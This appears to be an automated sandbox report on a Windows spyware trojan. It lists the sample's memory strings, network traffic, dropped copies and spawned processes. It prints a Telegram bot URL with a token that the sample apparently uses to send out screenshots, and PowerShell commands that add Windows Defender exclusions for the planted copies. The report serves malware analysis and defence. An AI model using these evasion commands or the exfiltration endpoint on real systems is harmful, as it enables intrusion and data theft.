                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhotoX
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: svchost.exe, 00000033.00000003.2049334674.000001F0A8E1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                          Source: powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000018.00000002.3244405482.0000023E3B510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                          Source: powershell.exe, 0000001A.00000002.3163703892.0000014AE8FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5Consumers
                          Source: W4tW72sfAD.exe, 00000000.00000002.1734047255.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.000000000378A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                          Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/country
                          Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip
                          Source: powershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: XrKvE5hfPM.49.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49749 version: TLS 1.2
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Window created: window name: CLIPBRDWNDCLASS
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP
                          Source: Joe Sandbox View; Dropped File: C:\Users\user\Desktop\BazpdGXT.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                          Source: W4tW72sfAD.exe, 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs W4tW72sfAD.exe
                          Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp; Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs W4tW72sfAD.exe
                          Source: W4tW72sfAD.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs; Cryptographic APIs: 'CreateDecryptor'
                          Source: classification engine; Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@45/93@4/5
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; File created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; File created: C:\Users\user\Desktop\cnkBPSdA.log
                          Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe; Mutant created: NULL
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\e185fbb618a233f9f6c1861641b571576fcfea1e7ff2912d0387b1f1e908cb75
                          Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; File created: C:\Users\user\AppData\Local\Temp\eqmixkc3
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
                          Source: W4tW72sfAD.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: W4tW72sfAD.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; File read: C:\Users\desktop.ini
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: W4tW72sfAD.exe; ReversingLabs: Detection: 68%
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; File read: C:\Users\user\Desktop\W4tW72sfAD.exe
                          Source: unknown; Process created: C:\Users\user\Desktop\W4tW72sfAD.exe "C:\Users\user\Desktop\W4tW72sfAD.exe"
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"
                          Source: unknown; Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: unknown; Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: unknown; Process created: C:\Users\Public\Downloads\RuntimeBroker.exe C:\Users\Public\Downloads\RuntimeBroker.exe
                          Source: unknown; Process created: C:\Users\Public\Downloads\RuntimeBroker.exe C:\Users\Public\Downloads\RuntimeBroker.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: unknown; Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: unknown; Process created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
                          Source: unknown; Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: unknown; Process created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
                          Source: unknown; Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: unknown; Process created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                          Source: C:\Windows\System32\cmd.exe; Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: version.dllJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: urlmon.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: iertutil.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: srvcli.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: netutils.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: wintypes.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: appresolver.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: bcp47langs.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: slc.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: userenv.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sppc.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mpr.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: pcacli.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: sfc_os.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: mscoree.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: kernel.appcore.dll
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeSection loaded: version.dll
